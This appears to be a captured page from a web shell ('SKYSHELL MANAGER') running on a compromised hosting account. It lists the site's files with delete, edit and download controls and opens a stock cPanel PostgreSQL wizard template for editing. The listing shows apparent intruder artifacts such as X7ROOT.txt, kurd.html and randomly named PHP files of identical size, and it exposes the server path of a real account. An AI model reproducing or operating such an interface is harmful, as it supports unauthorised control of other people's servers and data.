📁
SKYSHELL MANAGER
PHP v8.2.30
Create
Create
Path:
root
/
home
/
qooetu
/
costes.qooetu.com
/
Name
Size
Perm
Actions
📁
.well-known
-
0755
🗑️
🏷️
🔒
📁
2e19d9
-
0755
🗑️
🏷️
🔒
📁
6b114
-
0755
🗑️
🏷️
🔒
📁
Modules
-
0755
🗑️
🏷️
🔒
📁
app
-
0755
🗑️
🏷️
🔒
📁
assets
-
0755
🗑️
🏷️
🔒
📁
bootstrap
-
0755
🗑️
🏷️
🔒
📁
cgi-bin
-
0755
🗑️
🏷️
🔒
📁
config
-
0755
🗑️
🏷️
🔒
📁
css
-
0755
🗑️
🏷️
🔒
📁
database
-
0755
🗑️
🏷️
🔒
📁
images
-
0755
🗑️
🏷️
🔒
📁
js
-
0755
🗑️
🏷️
🔒
📁
nbproject
-
0755
🗑️
🏷️
🔒
📁
public
-
0755
🗑️
🏷️
🔒
📁
resources
-
0755
🗑️
🏷️
🔒
📁
routes
-
0755
🗑️
🏷️
🔒
📁
storage
-
0755
🗑️
🏷️
🔒
📁
tests
-
0755
🗑️
🏷️
🔒
📁
uploads
-
0755
🗑️
🏷️
🔒
📁
vendor
-
0755
🗑️
🏷️
🔒
📁
wp-admin
-
0755
🗑️
🏷️
🔒
📁
wp-content
-
0755
🗑️
🏷️
🔒
📁
wp-includes
-
0755
🗑️
🏷️
🔒
📄
.htaccess
0.23 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
COOKIE.txt
0.2 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
X7ROOT.txt
0.27 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
defaults.php
1.29 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
engine.php
0 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
error_log
813.08 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
features.php
11.28 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
googlecfb82e09419fc0f6.html
0.05 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
index.php0
1.56 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
inputs.php
0.12 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
kurd.html
1.07 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
library.php
0 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
min.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
p.php
2.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
php.ini
0.04 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
product.php
1.78 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
qpmwztts.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
robots.txt
0.32 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
tovmbkwh.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
tyyffovi.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
veoxv.html
1.23 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
Edit: wizard2.html.tt
[% SET CPANEL.CPVAR.dprefix = "../"; SET dbownerprefix = ExpVar.expand('$dbownerprefix'); SET max_length = 63 - dbownerprefix.length(); Api2.pre_exec("PasswdStrength", "get_required_strength"); SET required_strength_result = Api2.exec("PasswdStrength", "get_required_strength", {"app"=>"postgres"} ); Api2.post_exec("PasswdStrength", "get_required_strength"); SET password_strength = required_strength_result.0.strength; SET full_db = dbownerprefix _ RAW_FORM.db; IF !CPANEL.CPDATA.item('DEMO') && !(FORM.item('nocreate') == "1"); SET adddb_result = execute("Postgresql", "create_database", { name => full_db }); END; %] [% js_code = PROCESS js_block %] [% WRAPPER '_assets/master.html.tt' app_key = 'postgresql_database_wizard' page_js = js_code -%] <div class="body-content"> [% IF CPANEL.CPDATA.item('DEMO') %] <div id="details" class="alert alert-warning"> <span class="glyphicon glyphicon-exclamation-sign"></span> [% locale.maketext("This feature is disabled in demo mode.") %] </div> [% END %] [% IF !( FORM.item('nocreate') == "1") %] [% IF adddb_result.status -%] [% SET CPANEL.CPVAR.new_db = (dbownerprefix _ FORM.item('db')) %] <div class="alert alert-success"> <span class="glyphicon glyphicon-ok-sign"></span> [% locale.maketext("You have created a [asis,PostgreSQL] database named “[output,strong,_1]”.", full_db.html()) %] </div> [% ELSE %] <div class="alert alert-danger"> <span class="glyphicon glyphicon-exclamation-sign"></span> [% adddb_result.errors_as_string().html %] </div> [% END %] [% END -%] <div class="section"> <h2> [% locale.maketext("Step 2: Create Database Users:") %] </h2> <form method="post" form action="wizard3.html" name="mainform" id="mainform"> <!-- prevent password autofill --> <input type="text" style="display:none"> <input type="password" autocomplete='off' style="display:none"> <input type="hidden" name="db" value="[% full_db.html() %]" /> <div class="form-group"> <label for="user"> [% locale.maketext("Username:") %] </label> <div class="row"> <div class="col-xs-12 col-sm-6 col-md-6 col-lg-6"> [% IF dbownerprefix %] <div class="input-group"> <span class="input-group-addon"> [% dbownerprefix %] </span> <input type="text" class="form-control" size="15" name="user" id="user" maxlength="[% max_length %]" /> </div> [% ELSE %] <input type="text" class="form-control" size="15" name="user" id="user" maxlength="[% max_length %]"/> [% END %] </div> <div id="user_error" class="col-xs-12 col-sm-6 col-md-6 col-lg-6"> </div> </div> <span class="help-block"> [% locale.maketext("[output,strong,Note:] [quant,_1,character,characters] max.", max_length) %] </span> </div> <div class="form-group"> <label for="password"> [% locale.maketext("Password:") %] </label> <div class="row"> <div class="col-xs-12 col-sm-6 col-md-6 col-lg-6"> <input size="15" type="password" autocomplete='off' name="pass" id="password" class="form-control"/> </div> <div id="password_error" class="col-xs-12 col-sm-6 col-md-6 col-lg-6"> </div> </div> </div> <div class="form-group"> <label for="password2"> [% locale.maketext("Password (Again):") %] </label> <div class="row"> <div class="col-xs-12 col-sm-6 col-md-6 col-lg-6"> <input type="password" autocomplete='off' size="15" name="pass2" id="password2" class="form-control"/> </div> <div id="password2_error" class="col-xs-12 col-sm-6 col-md-6 col-lg-6"> </div> </div> </div> <div class="form-group"> <label> [% locale.maketext("Strength") %] <span id="why_strong_passwords_link" class="glyphicon glyphicon-info-sign"></span> </label> [% INCLUDE _assets/why_strong_passwords.html.tt %] <div class="row"> <div class="col-xs-12 col-sm-6 col-md-6 col-lg-6"> <div id="password_strength" class="password_strength"></div> </div> <div class="col-xs-12 col-sm-6 col-md-6 col-lg-6"> <input type="button" class="btn btn-default" id="create_strong_password" value="[% locale.maketext("Password Generator") %]" tabindex="-1" /> </div> </div> </div> <div class="form-group"> <input type="submit" value="[% locale.maketext("Create User") %]" class="btn btn-primary" id="submit_new_user" /> </div> </form> </div> <ul class="list-inline text-center"> <li> [% INCLUDE _assets/return_link.html.tt id_prefix='lnkStep1', return_location='wizard1.html' return_link_text=locale.maketext('Go Back') %] </li> <li> [% INCLUDE _assets/return_link.html.tt id_prefix='lnkHome', return_location='index.html' return_link_text=locale.maketext('Return to PostgreSQL Databases Main') data_testid='goBackToPgsqlMain' %] </li> </ul> </div><!-- end body-content --> [% END #wrapper %] [% BLOCK js_block %] <script type="text/javascript"> var REQUIRED_PASSWORD_STRENGTH = parseInt('[% password_strength.json() %]') || 0; /** * Initialize the validation for the create user form. */ var init_user_validation = function() { var user_validator = new CPANEL.validate.validator("[% locale.maketext("Username") %]"); user_validator.add("user", "sql_alphanumeric", "[% locale.maketext("Username must be alphanumeric characters.") %]"); user_validator.attach(); var password_validators = CPANEL.password.setup( "password", "password2", "password_strength", REQUIRED_PASSWORD_STRENGTH, "create_strong_password", "why_strong_passwords_link", "why_strong_passwords_text"); password_validators.push(user_validator); CPANEL.validate.attach_to_form("submit_new_user", password_validators); YAHOO.util.Dom.get("user").focus(); }; YAHOO.util.Event.onDOMReady(init_user_validation); </script> [% END #js_block %]
Save